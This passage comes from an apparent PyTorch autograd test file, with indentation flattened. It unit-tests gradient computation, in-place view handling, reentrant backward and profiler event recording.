self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This test checks the backward engine for a very subtle bug that appeared
# in one of the initial versions of autograd. Gradient tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. The engine used to keep a need_copy
# set of tensors that would need a clone upon the next addition, and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from the need_copy set.
# 2. When accumulating in the second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in the 3rd place).
# 3. When accumulating in the third place, it wasn't in the need_copy set
# either, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
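# torch.set_grad_enabled should work both as a context manager and as a plain
# function call, including when the two usages are nested.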
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
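# A Function whose backward() itself runs backward() on a small internal graph
# (reentrant autograd) should still produce the expected gradient.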
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False is passed below, but gradcheck is checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertEqual(r1, r2, rtol=0.01, atol=0.0)
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (defaults to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
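# Garbage-collecting a reference cycle that contains an intermediate Variable
# must not free graph state that backward still needs.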
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
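# At ties, torch.maximum/torch.minimum split the gradient evenly between the
# two inputs (0.5 each), which is what the expected grads below encode.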
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
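# Profiler smoke test: aten::mul and aten::add events should be recorded while
# the profiler is active, and the enabled flag should reset afterwards.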
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
# Ignore record_function user scope.
if "autograd::engine::evaluate_function" in e.name:
continue
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that the profiler will be able
# to propagate across the fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
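# A user-defined record_function("foo") scope should appear exactly once
# among the profiled events.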
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
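# With record_shapes=True the profiler should capture the input shapes of
# both aten::linear calls made by the two layers below.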
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate an arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
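# dir() on a tensor should only list attributes that actually resolve;
# real/imag raise a RuntimeError on a non-complex tensor but resolve on a
# complex one.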
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaNs in the output and consequently fail the numerical Jacobian check
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they work as expected (it would succeed even if
# the gradient had requires_grad == False).
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
